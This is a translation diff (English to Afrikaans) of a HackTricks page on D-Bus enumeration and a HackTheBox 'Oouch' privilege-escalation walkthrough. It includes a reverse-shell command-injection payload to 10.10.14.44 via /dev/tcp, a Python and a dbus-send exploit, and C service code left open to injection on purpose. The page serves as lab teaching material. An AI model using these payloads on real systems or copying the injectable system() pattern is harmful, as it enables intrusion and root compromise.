Sleutelkoppelvlak vir navorsingsdoeleindes is die **org.freedesktop.DBus.Introspectable**-koppelvlak, met 'n enkele metode, Introspect. Hierdie metode gee 'n XML-voorstelling van die ondersteunde metodes, seine en eienskappe van die voorwerp, met 'n fokus hier op metodes terwyl eienskappe en seine weggelaat word. +Vir kommunikasie met die D-Bus-koppelvlak is twee hulpmiddels gebruik: 'n CLI-hulpmiddel genaamd **gdbus** vir maklike aanroeping van metodes wat deur D-Bus in skripte blootgestel word, en [**D-Feet**](https://wiki.gnome.org/Apps/DFeet), 'n op Python gebaseerde GUI-hulpmiddel wat ontwerp is om die beskikbare dienste op elke bus te ondersoek en die voorwerpe wat in elke diens vervat is, te vertoon. ```bash sudo apt-get install d-feet ``` - ![https://unit42.paloaltonetworks.com/wp-content/uploads/2019/07/word-image-21.png](https://unit42.paloaltonetworks.com/wp-content/uploads/2019/07/word-image-21.png) ![https://unit42.paloaltonetworks.com/wp-content/uploads/2019/07/word-image-22.png](https://unit42.paloaltonetworks.com/wp-content/uploads/2019/07/word-image-22.png) -In the first image services registered with the D-Bus system bus are shown, with **org.debin.apt** specifically highlighted after selecting the System Bus button. D-Feet queries this service for objects, displaying interfaces, methods, properties, and signals for chosen objects, seen in the second image. Each method's signature is also detailed. +In die eerste prentjie word dienste wat geregistreer is by die D-Bus stelselbus gewys, met **org.debin.apt** spesifiek uitgelig nadat die System Bus-knoppie gekies is. D-Feet ondervra hierdie diens vir voorwerpe en wys die koppelvlakke, metodes, eienskappe en seine vir gekose voorwerpe, soos gesien in die tweede prentjie. Die handtekening van elke metode word ook beskryf. -A notable feature is the display of the service's **process ID (pid)** and **command line**, useful for confirming if the service runs with elevated privileges, important for research relevance. +'n Noemenswaardige kenmerk is die vertoning van die diens se **proses-ID (pid)** en **opdraglyn**, wat nuttig is om te bevestig of die diens met verhoogde bevoegdhede loop, wat belangrik is vir navorsingsdoeleindes. -**D-Feet also allows method invocation**: users can input Python expressions as parameters, which D-Feet converts to D-Bus types before passing to the service. +**D-Feet maak ook metode-aanroeping moontlik**: gebruikers kan Python-uitdrukkings as parameters invoer, wat D-Feet omskakel na D-Bus-tipes voordat dit aan die diens oorgedra word. -However, note that **some methods require authentication** before allowing us to invoke them. We will ignore these methods, since our goal is to elevate our privileges without credentials in the first place. +Let egter daarop dat **sommige metodes verifikasie vereis** voordat ons dit kan aanroep. Ons sal hierdie metodes ignoreer, aangesien ons doel is om ons bevoegdhede te verhoog sonder legitimasie in die eerste plek. -Also note that some of the services query another D-Bus service named org.freedeskto.PolicyKit1 whether a user should be allowed to perform certain actions or not. +Let ook daarop dat sommige van die dienste 'n ander D-Bus-diens, genaamd org.freedeskto.PolicyKit1, ondervra of 'n gebruiker toegelaat moet word om sekere aksies uit te voer of nie. -## **Cmd line Enumeration** +## **Opdraglynopname** -### List Service Objects - -It's possible to list opened D-Bus interfaces with: +### Lys Diensvoorwerpe +Dit is moontlik om geopende D-Bus-koppelvlakke te lys met: ```bash busctl list #List D-Bus interfaces NAME PID PROCESS USER CONNECTION UNIT SE -:1.0 1 systemd root :1.0 init.scope - +:1.0 1 systemd root :1.0 init.scope - :1.1345 12817 busctl qtc :1.1345 session-729.scope 72 -:1.2 1576 systemd-timesyn systemd-timesync :1.2 systemd-timesyncd.service - -:1.3 2609 dbus-server root :1.3 dbus-server.service - -:1.4 2606 wpa_supplicant root :1.4 wpa_supplicant.service - -:1.6 2612 systemd-logind root :1.6 systemd-logind.service - -:1.8 3087 unattended-upgr root :1.8 unattended-upgrades.serv… - -:1.820 6583 systemd qtc :1.820 user@1000.service - -com.ubuntu.SoftwareProperties - - - (activatable) - - -fi.epitest.hostap.WPASupplicant 2606 wpa_supplicant root :1.4 wpa_supplicant.service - -fi.w1.wpa_supplicant1 2606 wpa_supplicant root :1.4 wpa_supplicant.service - -htb.oouch.Block 2609 dbus-server root :1.3 dbus-server.service - -org.bluez - - - (activatable) - - -org.freedesktop.DBus 1 systemd root - init.scope - -org.freedesktop.PackageKit - - - (activatable) - - -org.freedesktop.PolicyKit1 - - - (activatable) - - -org.freedesktop.hostname1 - - - (activatable) - - -org.freedesktop.locale1 - - - (activatable) - - +:1.2 1576 systemd-timesyn systemd-timesync :1.2 systemd-timesyncd.service - +:1.3 2609 dbus-server root :1.3 dbus-server.service - +:1.4 2606 wpa_supplicant root :1.4 wpa_supplicant.service - +:1.6 2612 systemd-logind root :1.6 systemd-logind.service - +:1.8 3087 unattended-upgr root :1.8 unattended-upgrades.serv… - +:1.820 6583 systemd qtc :1.820 user@1000.service - +com.ubuntu.SoftwareProperties - - - (activatable) - - +fi.epitest.hostap.WPASupplicant 2606 wpa_supplicant root :1.4 wpa_supplicant.service - +fi.w1.wpa_supplicant1 2606 wpa_supplicant root :1.4 wpa_supplicant.service - +htb.oouch.Block 2609 dbus-server root :1.3 dbus-server.service - +org.bluez - - - (activatable) - - +org.freedesktop.DBus 1 systemd root - init.scope - +org.freedesktop.PackageKit - - - (activatable) - - +org.freedesktop.PolicyKit1 - - - (activatable) - - +org.freedesktop.hostname1 - - - (activatable) - - +org.freedesktop.locale1 - - - (activatable) - - ``` +#### Verbindings -#### Connections +[Vanaf Wikipedia:](https://af.wikipedia.org/wiki/D-Bus) Wanneer 'n proses 'n verbinding met 'n bus opstel, ken die bus aan die verbinding 'n spesiale busnaam toe wat 'n _unieke verbindingsnaam_ genoem word. Busname van hierdie tipe is onveranderlik - dit word gewaarborg dat dit nie sal verander solank die verbinding bestaan nie - en, belangriker nog, dit kan nie gedurende die leeftyd van die bus hergebruik word nie. Dit beteken dat geen ander verbinding met daardie bus ooit so 'n unieke verbindingsnaam sal hê nie, selfs as dieselfde proses die verbinding met die bus afsluit en 'n nuwe een skep. Unieke verbindingsname is maklik herkenbaar omdat hulle begin met die - andersins verbode - kolonkarakter. -[From wikipedia:](https://en.wikipedia.org/wiki/D-Bus) When a process sets up a connection to a bus, the bus assigns to the connection a special bus name called _unique connection name_. Bus names of this type are immutable—it's guaranteed they won't change as long as the connection exists—and, more importantly, they can't be reused during the bus lifetime. This means that no other connection to that bus will ever have assigned such unique connection name, even if the same process closes down the connection to the bus and creates a new one. Unique connection names are easily recognizable because they start with the—otherwise forbidden—colon character. - -### Service Object Info - -Then, you can obtain some information about the interface with: +### Diensobjekinligting +Dan kan jy enkele inligting oor die koppelvlak verkry met: ```bash busctl status htb.oouch.Block #Get info of "htb.oouch.Block" interface @@ -106,55 +101,51 @@ Session=n/a AuditLoginUID=n/a AuditSessionID=n/a UniqueName=:1.3 -EffectiveCapabilities=cap_chown cap_dac_override cap_dac_read_search - cap_fowner cap_fsetid cap_kill cap_setgid - cap_setuid cap_setpcap cap_linux_immutable cap_net_bind_service - cap_net_broadcast cap_net_admin cap_net_raw cap_ipc_lock - cap_ipc_owner cap_sys_module cap_sys_rawio cap_sys_chroot - cap_sys_ptrace cap_sys_pacct cap_sys_admin cap_sys_boot - cap_sys_nice cap_sys_resource cap_sys_time cap_sys_tty_config - cap_mknod cap_lease cap_audit_write cap_audit_control - cap_setfcap cap_mac_override cap_mac_admin cap_syslog - cap_wake_alarm cap_block_suspend cap_audit_read -PermittedCapabilities=cap_chown cap_dac_override cap_dac_read_search - cap_fowner cap_fsetid cap_kill cap_setgid - cap_setuid cap_setpcap cap_linux_immutable cap_net_bind_service - cap_net_broadcast cap_net_admin cap_net_raw cap_ipc_lock - cap_ipc_owner cap_sys_module cap_sys_rawio cap_sys_chroot - cap_sys_ptrace cap_sys_pacct cap_sys_admin cap_sys_boot - cap_sys_nice cap_sys_resource cap_sys_time cap_sys_tty_config - cap_mknod cap_lease cap_audit_write cap_audit_control - cap_setfcap cap_mac_override cap_mac_admin cap_syslog - cap_wake_alarm cap_block_suspend cap_audit_read +EffectiveCapabilities=cap_chown cap_dac_override cap_dac_read_search +cap_fowner cap_fsetid cap_kill cap_setgid +cap_setuid cap_setpcap cap_linux_immutable cap_net_bind_service +cap_net_broadcast cap_net_admin cap_net_raw cap_ipc_lock +cap_ipc_owner cap_sys_module cap_sys_rawio cap_sys_chroot +cap_sys_ptrace cap_sys_pacct cap_sys_admin cap_sys_boot +cap_sys_nice cap_sys_resource cap_sys_time cap_sys_tty_config +cap_mknod cap_lease cap_audit_write cap_audit_control +cap_setfcap cap_mac_override cap_mac_admin cap_syslog +cap_wake_alarm cap_block_suspend cap_audit_read +PermittedCapabilities=cap_chown cap_dac_override cap_dac_read_search +cap_fowner cap_fsetid cap_kill cap_setgid +cap_setuid cap_setpcap cap_linux_immutable cap_net_bind_service +cap_net_broadcast cap_net_admin cap_net_raw cap_ipc_lock +cap_ipc_owner cap_sys_module cap_sys_rawio cap_sys_chroot +cap_sys_ptrace cap_sys_pacct cap_sys_admin cap_sys_boot +cap_sys_nice cap_sys_resource cap_sys_time cap_sys_tty_config +cap_mknod cap_lease cap_audit_write cap_audit_control +cap_setfcap cap_mac_override cap_mac_admin cap_syslog +cap_wake_alarm cap_block_suspend cap_audit_read InheritableCapabilities= -BoundingCapabilities=cap_chown cap_dac_override cap_dac_read_search - cap_fowner cap_fsetid cap_kill cap_setgid - cap_setuid cap_setpcap cap_linux_immutable cap_net_bind_service - cap_net_broadcast cap_net_admin cap_net_raw cap_ipc_lock - cap_ipc_owner cap_sys_module cap_sys_rawio cap_sys_chroot - cap_sys_ptrace cap_sys_pacct cap_sys_admin cap_sys_boot - cap_sys_nice cap_sys_resource cap_sys_time cap_sys_tty_config - cap_mknod cap_lease cap_audit_write cap_audit_control - cap_setfcap cap_mac_override cap_mac_admin cap_syslog - cap_wake_alarm cap_block_suspend cap_audit_read +BoundingCapabilities=cap_chown cap_dac_override cap_dac_read_search +cap_fowner cap_fsetid cap_kill cap_setgid +cap_setuid cap_setpcap cap_linux_immutable cap_net_bind_service +cap_net_broadcast cap_net_admin cap_net_raw cap_ipc_lock +cap_ipc_owner cap_sys_module cap_sys_rawio cap_sys_chroot +cap_sys_ptrace cap_sys_pacct cap_sys_admin cap_sys_boot +cap_sys_nice cap_sys_resource cap_sys_time cap_sys_tty_config +cap_mknod cap_lease cap_audit_write cap_audit_control +cap_setfcap cap_mac_override cap_mac_admin cap_syslog +cap_wake_alarm cap_block_suspend cap_audit_read ``` +### Lys van Intervlakke van 'n Diensvoorwerp -### List Interfaces of a Service Object - -You need to have enough permissions. - +Jy moet genoeg toestemmings hê. ```bash busctl tree htb.oouch.Block #Get Interfaces of the service object └─/htb - └─/htb/oouch - └─/htb/oouch/Block +└─/htb/oouch +└─/htb/oouch/Block ``` +### Introspekteer die koppelvlak van 'n Diensvoorwerp -### Introspect Interface of a Service Object - -Note how in this example it was selected the latest interface discovered using the `tree` parameter (_see previous section_): - +Merk op hoe in hierdie voorbeeld die nuutste koppelvlak wat ontdek is, gekies is deur die `tree` parameter te gebruik (_sien vorige afdeling_): ```bash busctl introspect htb.oouch.Block /htb/oouch/Block #Get methods of the interface @@ -172,60 +163,52 @@ org.freedesktop.DBus.Properties interface - - - .Set method ssv - - .PropertiesChanged signal sa{sv}as - - ``` +Merk die metode `.Block` van die koppelvlak `htb.oouch.Block` (die een waarin ons belangstel). Die "s" van die ander kolomme mag beteken dat dit 'n string verwag. -Note the method `.Block` of the interface `htb.oouch.Block` (the one we are interested in). The "s" of the other columns may mean that it's expecting a string. +### Monitor/Vaslegging Koppelvlak -### Monitor/Capture Interface +Met genoeg bevoegdhede (net `send_destination` en `receive_sender` bevoegdhede is nie genoeg nie) kan jy 'n D-Bus kommunikasie **monitor**. -With enough privileges (just `send_destination` and `receive_sender` privileges aren't enough) you can **monitor a D-Bus communication**. - -In order to **monitor** a **communication** you will need to be **root.** If you still find problems being root check [https://piware.de/2013/09/how-to-watch-system-d-bus-method-calls/](https://piware.de/2013/09/how-to-watch-system-d-bus-method-calls/) and [https://wiki.ubuntu.com/DebuggingDBus](https://wiki.ubuntu.com/DebuggingDBus) +Om 'n **kommunikasie te monitor**, moet jy **root** wees. As jy steeds probleme ondervind om root te wees, kyk na [https://piware.de/2013/09/how-to-watch-system-d-bus-method-calls/](https://piware.de/2013/09/how-to-watch-system-d-bus-method-calls/) en [https://wiki.ubuntu.com/DebuggingDBus](https://wiki.ubuntu.com/DebuggingDBus) {% hint style="warning" %} -If you know how to configure a D-Bus config file to **allow non root users to sniff** the communication please **contact me**! +As jy weet hoe om 'n D-Bus konfigurasie lêer te konfigureer om **nie-root gebruikers toe te laat om die kommunikasie te snuffel nie**, kontak my asseblief! {% endhint %} -Different ways to monitor: - +Verskillende maniere om te monitor: ```bash sudo busctl monitor htb.oouch.Block #Monitor only specified sudo busctl monitor #System level, even if this works you will only see messages you have permissions to see sudo dbus-monitor --system #System level, even if this works you will only see messages you have permissions to see ``` - -In the following example the interface `htb.oouch.Block` is monitored and **the message "**_**lalalalal**_**" is sent through miscommunication**: - +In die volgende voorbeeld word die koppelvlak `htb.oouch.Block` gemonitor en **die boodskap "**_**lalalalal**_**" word deur misverstand gestuur**: ```bash busctl monitor htb.oouch.Block Monitoring bus message stream. ‣ Type=method_call Endian=l Flags=0 Version=1 Priority=0 Cookie=2 - Sender=:1.1376 Destination=htb.oouch.Block Path=/htb/oouch/Block Interface=htb.oouch.Block Member=Block - UniqueName=:1.1376 - MESSAGE "s" { - STRING "lalalalal"; - }; +Sender=:1.1376 Destination=htb.oouch.Block Path=/htb/oouch/Block Interface=htb.oouch.Block Member=Block +UniqueName=:1.1376 +MESSAGE "s" { +STRING "lalalalal"; +}; ‣ Type=method_return Endian=l Flags=1 Version=1 Priority=0 Cookie=16 ReplyCookie=2 - Sender=:1.3 Destination=:1.1376 - UniqueName=:1.3 - MESSAGE "s" { - STRING "Carried out :D"; - }; +Sender=:1.3 Destination=:1.1376 +UniqueName=:1.3 +MESSAGE "s" { +STRING "Carried out :D"; +}; ``` +Jy kan `capture` gebruik in plaas van `monitor` om die resultate in 'n pcap-lêer te stoor. -You can use `capture` instead of `monitor` to save the results in a pcap file. - -#### Filtering all the noise - -If there is just too much information on the bus, pass a match rule like so: +#### Filtrering van al die geraas +As daar net te veel inligting op die bus is, stel 'n ooreenstemmingsreël soos volg voor: ```bash dbus-monitor "type=signal,sender='org.gnome.TypingMonitor',interface='org.gnome.TypingMonitor'" ``` - -Multiple rules can be specified. If a message matches _any_ of the rules, the message will be printed. Like so: - +Verskeie reëls kan gespesifiseer word. As 'n boodskap aan _enige_ van die reëls voldoen, sal die boodskap gedruk word. Soos volg: ```bash dbus-monitor "type=error" "sender=org.freedesktop.SystemToolsBackends" ``` @@ -233,83 +216,73 @@ dbus-monitor "type=error" "sender=org.freedesktop.SystemToolsBackends" ```bash dbus-monitor "type=method_call" "type=method_return" "type=error" ``` +Sien die [D-Bus dokumentasie](http://dbus.freedesktop.org/doc/dbus-specification.html) vir meer inligting oor die sintaksis van ooreenstemmingsreëls. -See the [D-Bus documentation](http://dbus.freedesktop.org/doc/dbus-specification.html) for more information on match rule syntax. +### Meer -### More +`busctl` het selfs meer opsies, [**vind almal hier**](https://www.freedesktop.org/software/systemd/man/busctl.html). -`busctl` has even more options, [**find all of them here**](https://www.freedesktop.org/software/systemd/man/busctl.html). - -## **Vulnerable Scenario** - -As user **qtc inside the host "oouch" from HTB** you can find an **unexpected D-Bus config file** located in _/etc/dbus-1/system.d/htb.oouch.Block.conf_: +## **Kwesbare Scenario** +As gebruiker **qtc binne die gasheer "oouch" van HTB**, kan jy 'n **onverwagte D-Bus konfigurasie-lêer** vind wat in _/etc/dbus-1/system.d/htb.oouch.Block.conf_ geleë is: ```xml +"-//freedesktop//DTD D-BUS Bus Configuration 1.0//EN" +"http://www.freedesktop.org/standards/dbus/1.0/busconfig.dtd"> - - - + + + - - - - + + + + ``` +Nota van die vorige konfigurasie is dat **jy as die gebruiker `root` of `www-data` moet wees om inligting te stuur en ontvang** via hierdie D-BUS kommunikasie. -Note from the previous configuration that **you will need to be the user `root` or `www-data` to send and receive information** via this D-BUS communication. - -As user **qtc** inside the docker container **aeb4525789d8** you can find some dbus related code in the file _/code/oouch/routes.py._ This is the interesting code: - +As gebruiker **qtc** binne die docker houer **aeb4525789d8** kan jy 'n paar dbus-verwante kode in die lêer _/code/oouch/routes.py_ vind. Hier is die interessante kode: ```python if primitive_xss.search(form.textfield.data): - bus = dbus.SystemBus() - block_object = bus.get_object('htb.oouch.Block', '/htb/oouch/Block') - block_iface = dbus.Interface(block_object, dbus_interface='htb.oouch.Block') +bus = dbus.SystemBus() +block_object = bus.get_object('htb.oouch.Block', '/htb/oouch/Block') +block_iface = dbus.Interface(block_object, dbus_interface='htb.oouch.Block') - client_ip = request.environ.get('REMOTE_ADDR', request.remote_addr) - response = block_iface.Block(client_ip) - bus.close() - return render_template('hacker.html', title='Hacker') +client_ip = request.environ.get('REMOTE_ADDR', request.remote_addr) +response = block_iface.Block(client_ip) +bus.close() +return render_template('hacker.html', title='Hacker') ``` +Soos u kan sien, is dit **verbind met 'n D-Bus-koppelvlak** en stuur die "client\_ip" na die **"Block" funksie**. -As you can see, it is **connecting to a D-Bus interface** and sending to the **"Block" function** the "client\_ip". +Aan die ander kant van die D-Bus-koppeling is daar 'n C-kompilasie-binêre wat loop. Hierdie kode is **aan die luister** in die D-Bus-koppeling **vir IP-adres en roep iptables aan via die `system`-funksie** om die gegewe IP-adres te blokkeer.\ +**Die oproep na `system` is opsetlik vatbaar vir opdraginspuiting**, so 'n lading soos die volgende sal 'n omgekeerde dop skep: `;bash -c 'bash -i >& /dev/tcp/10.10.14.44/9191 0>&1' #` -In the other side of the D-Bus connection there is some C compiled binary running. This code is **listening** in the D-Bus connection **for IP address and is calling iptables via `system` function** to block the given IP address.\ -**The call to `system` is vulnerable on purpose to command injection**, so a payload like the following one will create a reverse shell: `;bash -c 'bash -i >& /dev/tcp/10.10.14.44/9191 0>&1' #` - -### Exploit it - -At the end of this page you can find the **complete C code of the D-Bus application**. Inside of it you can find between the lines 91-97 **how the `D-Bus object path`** **and `interface name`** are **registered**. This information will be necessary to send information to the D-Bus connection: +### Exploiteer dit +Aan die einde van hierdie bladsy kan u die **volledige C-kode van die D-Bus-toepassing** vind. Binne-in kan u tussen die lyne 91-97 vind **hoe die `D-Bus-objectpad`** **en `koppelvlaknaam`** **geregistreer** word. Hierdie inligting sal nodig wees om inligting na die D-Bus-koppeling te stuur: ```c - /* Install the object */ - r = sd_bus_add_object_vtable(bus, - &slot, - "/htb/oouch/Block", /* interface */ - "htb.oouch.Block", /* service object */ - block_vtable, - NULL); +/* Install the object */ +r = sd_bus_add_object_vtable(bus, +&slot, +"/htb/oouch/Block", /* interface */ +"htb.oouch.Block", /* service object */ +block_vtable, +NULL); ``` - -Also, in line 57 you can find that **the only method registered** for this D-Bus communication is called `Block`(_**Thats why in the following section the payloads are going to be sent to the service object `htb.oouch.Block`, the interface `/htb/oouch/Block` and the method name `Block`**_): - +Ook, in lyn 57 kan jy vind dat **die enigste geregistreerde metode** vir hierdie D-Bus kommunikasie genoem word `Block`(_**Dit is hoekom die vullastelle in die volgende afdeling na die diensvoorwerp `htb.oouch.Block`, die koppelvlak `/htb/oouch/Block` en die metode naam `Block` gestuur gaan word**_): ```c SD_BUS_METHOD("Block", "s", "s", method_block, SD_BUS_VTABLE_UNPRIVILEGED), ``` - #### Python -The following python code will send the payload to the D-Bus connection to the `Block` method via `block_iface.Block(runme)` (_note that it was extracted from the previous chunk of code_): - +Die volgende Python-kode sal die payload stuur na die D-Bus-verbinding na die `Block`-metode via `block_iface.Block(runme)` (_let wel dat dit uit die vorige stuk kode gehaal is_): ```python import dbus bus = dbus.SystemBus() @@ -319,23 +292,26 @@ runme = ";bash -c 'bash -i >& /dev/tcp/10.10.14.44/9191 0>&1' #" response = block_iface.Block(runme) bus.close() ``` +#### busctl en dbus-send -#### busctl and dbus-send +`busctl` is a command-line tool used to interact with the D-Bus system bus. It allows users to introspect and monitor the bus, as well as send method calls and signals to D-Bus services. +`dbus-send` is another command-line tool that can be used to send messages to D-Bus destinations. It can be used to invoke methods on D-Bus interfaces and send signals. + +Both `busctl` and `dbus-send` are powerful tools that can be used for enumeration and command injection during privilege escalation attacks. ```bash dbus-send --system --print-reply --dest=htb.oouch.Block /htb/oouch/Block htb.oouch.Block.Block string:';pring -c 1 10.10.14.44 #' ``` +* `dbus-send` is 'n hulpmiddel wat gebruik word om 'n boodskap na die "Message Bus" te stuur. +* Message Bus - 'n sagteware wat deur stelsels gebruik word om kommunikasie tussen programme maklik te maak. Dit is verwant aan 'n "Message Queue" (boodskappe word in volgorde geplaas), maar in 'n Message Bus word die boodskappe in 'n intekenmodel gestuur en is dit ook baie vinnig. +* Die "–system" etiket word gebruik om aan te dui dat dit 'n stelselboodskap is, nie 'n sessieboodskap (standaard). +* Die "–print-reply" etiket word gebruik om ons boodskap op die regte manier af te druk en enige antwoorde in 'n mensleesbare formaat te ontvang. +* "–dest=Dbus-Interface-Block" is die adres van die Dbus-interface. +* "–string:" - Die tipe boodskap wat ons na die interface wil stuur. Daar is verskeie formate om boodskappe te stuur, soos dubbel, bytes, booleans, int, objekpad. Van hierdie formate is die "objekpad" nuttig wanneer ons 'n pad van 'n lêer na die Dbus-interface wil stuur. In hierdie geval kan ons 'n spesiale lêer (FIFO) gebruik om 'n opdrag na die interface oor te dra in die naam van 'n lêer. "string:; " - Dit is om die objekpad weer te roep waar ons die FIFO-omkeer-skulpuntlêer/opdrag plaas. -* `dbus-send` is a tool used to send message to “Message Bus” -* Message Bus – A software used by systems to make communications between applications easily. It’s related to Message Queue (messages are ordered in sequence) but in Message Bus the messages are sending in a subscription model and also very quick. -* “-system” tag is used to mention that it is a system message, not a session message (by default). -* “–print-reply” tag is used to print our message appropriately and receives any replies in a human-readable format. -* “–dest=Dbus-Interface-Block” The address of the Dbus interface. -* “–string:” – Type of message we like to send to the interface. There are several formats of sending messages like double, bytes, booleans, int, objpath. Out of this, the “object path” is useful when we want to send a path of a file to the Dbus interface. We can use a special file (FIFO) in this case to pass a command to interface in the name of a file. “string:;” – This is to call the object path again where we place of FIFO reverse shell file/command. +Merk op dat in `htb.oouch.Block.Block` verwys die eerste deel (`htb.oouch.Block`) na die diensobjek en die laaste deel (`.Block`) na die metode se naam. -_Note that in `htb.oouch.Block.Block`, the first part (`htb.oouch.Block`) references the service object and the last part (`.Block`) references the method name._ - -### C code +### C-kode {% code title="d-bus_server.c" %} ```c @@ -351,148 +327,148 @@ _Note that in `htb.oouch.Block.Block`, the first part (`htb.oouch.Block`) refere #include static int method_block(sd_bus_message *m, void *userdata, sd_bus_error *ret_error) { - char* host = NULL; - int r; +char* host = NULL; +int r; - /* Read the parameters */ - r = sd_bus_message_read(m, "s", &host); - if (r < 0) { - fprintf(stderr, "Failed to obtain hostname: %s\n", strerror(-r)); - return r; - } +/* Read the parameters */ +r = sd_bus_message_read(m, "s", &host); +if (r < 0) { +fprintf(stderr, "Failed to obtain hostname: %s\n", strerror(-r)); +return r; +} - char command[] = "iptables -A PREROUTING -s %s -t mangle -j DROP"; +char command[] = "iptables -A PREROUTING -s %s -t mangle -j DROP"; - int command_len = strlen(command); - int host_len = strlen(host); +int command_len = strlen(command); +int host_len = strlen(host); - char* command_buffer = (char *)malloc((host_len + command_len) * sizeof(char)); - if(command_buffer == NULL) { - fprintf(stderr, "Failed to allocate memory\n"); - return -1; - } +char* command_buffer = (char *)malloc((host_len + command_len) * sizeof(char)); +if(command_buffer == NULL) { +fprintf(stderr, "Failed to allocate memory\n"); +return -1; +} - sprintf(command_buffer, command, host); +sprintf(command_buffer, command, host); - /* In the first implementation, we simply ran command using system(), since the expected DBus - * to be threading automatically. However, DBus does not thread and the application will hang - * forever if some user spawns a shell. Thefore we need to fork (easier than implementing real - * multithreading) - */ - int pid = fork(); +/* In the first implementation, we simply ran command using system(), since the expected DBus +* to be threading automatically. However, DBus does not thread and the application will hang +* forever if some user spawns a shell. Thefore we need to fork (easier than implementing real +* multithreading) +*/ +int pid = fork(); - if ( pid == 0 ) { - /* Here we are in the child process. We execute the command and eventually exit. */ - system(command_buffer); - exit(0); - } else { - /* Here we are in the parent process or an error occured. We simply send a genric message. - * In the first implementation we returned separate error messages for success or failure. - * However, now we cannot wait for results of the system call. Therefore we simply return - * a generic. */ - return sd_bus_reply_method_return(m, "s", "Carried out :D"); - } - r = system(command_buffer); +if ( pid == 0 ) { +/* Here we are in the child process. We execute the command and eventually exit. */ +system(command_buffer); +exit(0); +} else { +/* Here we are in the parent process or an error occured. We simply send a genric message. +* In the first implementation we returned separate error messages for success or failure. +* However, now we cannot wait for results of the system call. Therefore we simply return +* a generic. */ +return sd_bus_reply_method_return(m, "s", "Carried out :D"); +} +r = system(command_buffer); } /* The vtable of our little object, implements the net.poettering.Calculator interface */ static const sd_bus_vtable block_vtable[] = { - SD_BUS_VTABLE_START(0), - SD_BUS_METHOD("Block", "s", "s", method_block, SD_BUS_VTABLE_UNPRIVILEGED), - SD_BUS_VTABLE_END +SD_BUS_VTABLE_START(0), +SD_BUS_METHOD("Block", "s", "s", method_block, SD_BUS_VTABLE_UNPRIVILEGED), +SD_BUS_VTABLE_END }; int main(int argc, char *argv[]) { - /* - * Main method, registeres the htb.oouch.Block service on the system dbus. - * - * Paramaters: - * argc (int) Number of arguments, not required - * argv[] (char**) Argument array, not required - * - * Returns: - * Either EXIT_SUCCESS ot EXIT_FAILURE. Howeverm ideally it stays alive - * as long as the user keeps it alive. - */ +/* +* Main method, registeres the htb.oouch.Block service on the system dbus. +* +* Paramaters: +* argc (int) Number of arguments, not required +* argv[] (char**) Argument array, not required +* +* Returns: +* Either EXIT_SUCCESS ot EXIT_FAILURE. Howeverm ideally it stays alive +* as long as the user keeps it alive. +*/ - /* To prevent a huge numer of defunc process inside the tasklist, we simply ignore client signals */ - signal(SIGCHLD,SIG_IGN); +/* To prevent a huge numer of defunc process inside the tasklist, we simply ignore client signals */ +signal(SIGCHLD,SIG_IGN); - sd_bus_slot *slot = NULL; - sd_bus *bus = NULL; - int r; +sd_bus_slot *slot = NULL; +sd_bus *bus = NULL; +int r; - /* First we need to connect to the system bus. */ - r = sd_bus_open_system(&bus); - if (r < 0) - { - fprintf(stderr, "Failed to connect to system bus: %s\n", strerror(-r)); - goto finish; - } +/* First we need to connect to the system bus. */ +r = sd_bus_open_system(&bus); +if (r < 0) +{ +fprintf(stderr, "Failed to connect to system bus: %s\n", strerror(-r)); +goto finish; +} - /* Install the object */ - r = sd_bus_add_object_vtable(bus, - &slot, - "/htb/oouch/Block", /* interface */ - "htb.oouch.Block", /* service object */ - block_vtable, - NULL); - if (r < 0) { - fprintf(stderr, "Failed to install htb.oouch.Block: %s\n", strerror(-r)); - goto finish; - } +/* Install the object */ +r = sd_bus_add_object_vtable(bus, +&slot, +"/htb/oouch/Block", /* interface */ +"htb.oouch.Block", /* service object */ +block_vtable, +NULL); +if (r < 0) { +fprintf(stderr, "Failed to install htb.oouch.Block: %s\n", strerror(-r)); +goto finish; +} - /* Register the service name to find out object */ - r = sd_bus_request_name(bus, "htb.oouch.Block", 0); - if (r < 0) { - fprintf(stderr, "Failed to acquire service name: %s\n", strerror(-r)); - goto finish; - } +/* Register the service name to find out object */ +r = sd_bus_request_name(bus, "htb.oouch.Block", 0); +if (r < 0) { +fprintf(stderr, "Failed to acquire service name: %s\n", strerror(-r)); +goto finish; +} - /* Infinite loop to process the client requests */ - for (;;) { - /* Process requests */ - r = sd_bus_process(bus, NULL); - if (r < 0) { - fprintf(stderr, "Failed to process bus: %s\n", strerror(-r)); - goto finish; - } - if (r > 0) /* we processed a request, try to process another one, right-away */ - continue; +/* Infinite loop to process the client requests */ +for (;;) { +/* Process requests */ +r = sd_bus_process(bus, NULL); +if (r < 0) { +fprintf(stderr, "Failed to process bus: %s\n", strerror(-r)); +goto finish; +} +if (r > 0) /* we processed a request, try to process another one, right-away */ +continue; - /* Wait for the next request to process */ - r = sd_bus_wait(bus, (uint64_t) -1); - if (r < 0) { - fprintf(stderr, "Failed to wait on bus: %s\n", strerror(-r)); - goto finish; - } - } +/* Wait for the next request to process */ +r = sd_bus_wait(bus, (uint64_t) -1); +if (r < 0) { +fprintf(stderr, "Failed to wait on bus: %s\n", strerror(-r)); +goto finish; +} +} finish: - sd_bus_slot_unref(slot); - sd_bus_unref(bus); +sd_bus_slot_unref(slot); +sd_bus_unref(bus); - return r < 0 ? EXIT_FAILURE : EXIT_SUCCESS; +return r < 0 ? EXIT_FAILURE : EXIT_SUCCESS; } ``` {% endcode %} -## References +## Verwysings * [https://unit42.paloaltonetworks.com/usbcreator-d-bus-privilege-escalation-in-ubuntu-desktop/](https://unit42.paloaltonetworks.com/usbcreator-d-bus-privilege-escalation-in-ubuntu-desktop/)
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk 